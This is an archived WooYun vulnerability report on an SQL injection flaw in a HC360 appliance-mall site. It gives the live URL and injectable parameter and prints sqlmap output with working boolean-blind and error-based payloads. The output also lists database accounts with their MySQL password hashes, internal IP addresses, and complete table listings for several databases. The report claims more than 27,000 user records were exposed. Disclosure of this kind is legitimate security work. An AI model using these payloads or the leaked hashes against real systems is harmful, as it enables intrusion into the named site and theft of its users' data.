当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172428

漏洞标题:慧聪某站点存在SQL注入漏洞涉及2W+条用户数据

相关厂商:慧聪网

漏洞作者: pudding2

提交时间:2016-01-24 22:10

修复时间:2016-03-08 21:29

公开时间:2016-03-08 21:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-24: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经确认,细节仅向厂商公开
2016-02-04: 细节向核心白帽子及相关领域专家公开
2016-02-14: 细节向普通白帽子公开
2016-02-24: 细节向实习白帽子公开
2016-03-08: 细节向公众公开

简要描述:

慧聪某站点存在SQL注入漏洞,涉及2W+条用户数据

详细说明:

慧聪家电城存在SQL注入漏洞,涉及27033条用户数据
漏洞URL:http://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B
注入点:store_id

sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:
---
Parameter: store_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: act=show_store&store_id=-6061 OR 1964=1964#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: act=show_store&store_id=-6061 OR 1964=1964#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
current user:    'root@localhost'
current database:    'jdmall'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: act=show_store&store_id=-6061 OR 1964=1964#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
database management system users [11]:
[*] ''@'hcjdc'
[*] ''@'localhost'
[*] 'bj001'@'192.168.50.167'
[*] 'bj001'@'192.168.60.%'
[*] 'bj001'@'192.168.70.250'
[*] 'root'@'127.0.0.1'
[*] 'root'@'hcjdc'
[*] 'root'@'localhost'
[*] 'test2'@'localhost'
[*] 'wangheng2'@'%'
[*] 'wangheng2'@'58.252.73.135'
database management system users password hashes:
[*] bj001 [2]:
    password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
    password hash: NULL
[*] root [2]:
    password hash: *68A0D0586406B0933796F17C337E99BB02E07788
    password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
[*] test2 [1]:
    password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA
[*] wangheng2 [2]:
    password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA
    password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F


数据库和表:

back-end DBMS: MySQL 5
Database: hcjdmjcrm
[46 tables]
+---------------------------------------+
| crm_attendplace                       |
| crm_contact                           |
| crm_contract                          |
| crm_contract_attachment               |
| crm_customer                          |
| crm_customer_industryissue            |
| crm_customer_offlineactivity          |
| crm_customer_spreadproject            |
| crm_dealrecord                        |
| crm_follow                            |
| crm_industryissue                     |
| crm_invoice                           |
| crm_offlineactivity                   |
| crm_offlineactivityinviterecord       |
| crm_order                             |
| crm_order_details                     |
| crm_product                           |
| crm_product_category                  |
| crm_receive                           |
| crm_spreadproject                     |
| crm_supplier                          |
| crm_supplierdealdetail                |
| hr_department                         |
| hr_employee                           |
| hr_position                           |
| hr_post                               |
| param_city                            |
| param_sysparam                        |
| param_sysparam_type                   |
| personal_calendar                     |
| personal_notes                        |
| public_news                           |
| public_notice                         |
| sys_app                               |
| sys_authority                         |
| sys_button                            |
| sys_data_authority                    |
| sys_info                              |
| sys_log                               |
| sys_log_err                           |
| sys_menu                              |
| sys_online                            |
| sys_role                              |
| sys_role_emp                          |
| temp                                  |
| tool_batch                            |
+---------------------------------------+
Database: jdmall
[196 tables]
+---------------------------------------+
| base_appendproperty                   |
| base_appendpropertyinstance           |
| base_button                           |
| base_file                             |
| base_log                              |
| base_month                            |
| base_notice                           |
| base_o_a_setup                        |
| base_organization                     |
| base_recyclebin                       |
| base_roleright                        |
| base_roles                            |
| base_stafforganize                    |
| base_sysloginlog                      |
| base_sysmenu                          |
| base_usergroup                        |
| base_usergroupright                   |
| base_userinfo                         |
| base_userinfousergroup                |
| base_userright                        |
| base_userrole                         |
| jd_account_log                        |
| jd_ad                                 |
| jd_ad_custom                          |
| jd_ad_position                        |
| jd_admin_action                       |
| jd_admin_log                          |
| jd_admin_message                      |
| jd_admin_user                         |
| jd_adsense                            |
| jd_affiliate_log                      |
| jd_agency                             |
| jd_area_region                        |
| jd_article                            |
| jd_article_cat                        |
| jd_attribute                          |
| jd_auction_log                        |
| jd_auto_manage                        |
| jd_back_goods                         |
| jd_back_order                         |
| jd_bonus_log                          |
| jd_bonus_price                        |
| jd_bonus_type                         |
| jd_booking_goods                      |
| jd_brand                              |
| jd_brand_cat                          |
| jd_brand_copy                         |
| jd_cancel_goods_log                   |
| jd_card                               |
| jd_cart                               |
| jd_cat_recommend                      |
| jd_category                           |
| jd_category1                          |
| jd_category2                          |
| jd_check_log                          |
| jd_collect_goods                      |
| jd_comment                            |
| jd_compare_log                        |
| jd_crons                              |
| jd_delivery_goods                     |
| jd_delivery_order                     |
| jd_delivery_order_remark              |
| jd_email_list                         |
| jd_email_sendlist                     |
| jd_entrust                            |
| jd_entrust_log                        |
| jd_error_log                          |
| jd_exchange_goods                     |
| jd_favourable_activity                |
| jd_feedback                           |
| jd_free_sample                        |
| jd_friend_link                        |
| jd_goods                              |
| jd_goods_activity                     |
| jd_goods_article                      |
| jd_goods_attr                         |
| jd_goods_attr_log                     |
| jd_goods_cat                          |
| jd_goods_gallery                      |
| jd_goods_log                          |
| jd_goods_price_log                    |
| jd_goods_type                         |
| jd_goods_unit                         |
| jd_grab_address                       |
| jd_grab_area                          |
| jd_grab_site_info                     |
| jd_group_goods                        |
| jd_hc360_category                     |
| jd_house_cat                          |
| jd_keywords                           |
| jd_link_goods                         |
| jd_login_log_0                        |
| jd_login_log_1                        |
| jd_login_log_2                        |
| jd_login_log_3                        |
| jd_login_log_4                        |
| jd_login_log_5                        |
| jd_login_log_6                        |
| jd_login_log_7                        |
| jd_login_log_8                        |
| jd_login_log_9                        |
| jd_logistics                          |
| jd_mail_templates                     |
| jd_member_price                       |
| jd_mmt_shop_info                      |
| jd_mmt_shop_info_copy                 |
| jd_nav                                |
| jd_order_action                       |
| jd_order_goods                        |
| jd_order_info                         |
| jd_order_logistics                    |
| jd_pack                               |
| jd_package_goods                      |
| jd_pay_log                            |
| jd_payment                            |
| jd_plugins                            |
| jd_priceoff_activity                  |
| jd_priceoff_activity_log              |
| jd_priceoff_goods                     |
| jd_products                           |
| jd_provider                           |
| jd_provider_product                   |
| jd_recommend_list                     |
| jd_reconciliation                     |
| jd_refund_goods                       |
| jd_refund_orders                      |
| jd_reg_confirm_log                    |
| jd_reg_extend_info                    |
| jd_reg_fields                         |
| jd_reg_sms_log                        |
| jd_region                             |
| jd_region_bak                         |
| jd_retailer_info                      |
| jd_role                               |
| jd_salesupport_request                |
| jd_salesupport_response               |
| jd_search_log                         |
| jd_searchengine                       |
| jd_server_edit_log                    |
| jd_server_info                        |
| jd_server_information                 |
| jd_server_logistics                   |
| jd_sessions                           |
| jd_sessions_data                      |
| jd_shield_city                        |
| jd_shipping                           |
| jd_shipping_area                      |
| jd_shop                               |
| jd_shop_cat                           |
| jd_shop_company_info                  |
| jd_shop_company_info_bat              |
| jd_shop_config                        |
| jd_sms_extend_user                    |
| jd_sms_log                            |
| jd_snatch_log                         |
| jd_stats                              |
| jd_supplier_info                      |
| jd_suppliers                          |
| jd_tag                                |
| jd_template                           |
| jd_topic                              |
| jd_touch_activity                     |
| jd_touch_ad                           |
| jd_touch_ad_position                  |
| jd_touch_adsense                      |
| jd_touch_article                      |
| jd_touch_article_cat                  |
| jd_touch_auth                         |
| jd_touch_brand                        |
| jd_touch_category                     |
| jd_touch_feedback                     |
| jd_touch_goods                        |
| jd_touch_goods_activity               |
| jd_touch_nav                          |
| jd_touch_payment                      |
| jd_touch_shop_config                  |
| jd_touch_topic                        |
| jd_touch_user_info                    |
| jd_user_account                       |
| jd_user_address                       |
| jd_user_bonus                         |
| jd_user_card_info                     |
| jd_user_feed                          |
| jd_user_key                           |
| jd_user_rank                          |
| jd_user_white_list                    |
| jd_users                              |
| jd_users_new                          |
| jd_virtual_card                       |
| jd_volume_price                       |
| jd_volume_price_log                   |
| jd_vote                               |
| jd_vote_log                           |
| jd_vote_option                        |
| jd_voucher                            |
| jd_wholesale                          |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+


用户表数据总共:27033条

5.jpg

漏洞证明:

6.jpg


7.jpg

修复方案:

过滤

版权声明:转载请注明来源 pudding2@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-25 10:57

厂商回复:

谢谢您。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-24 23:57 | 残雪 ( 实习白帽子 | Rank:34 漏洞数:7 | 屌丝一枚擅长扯淡)

    有些东西最好不要动。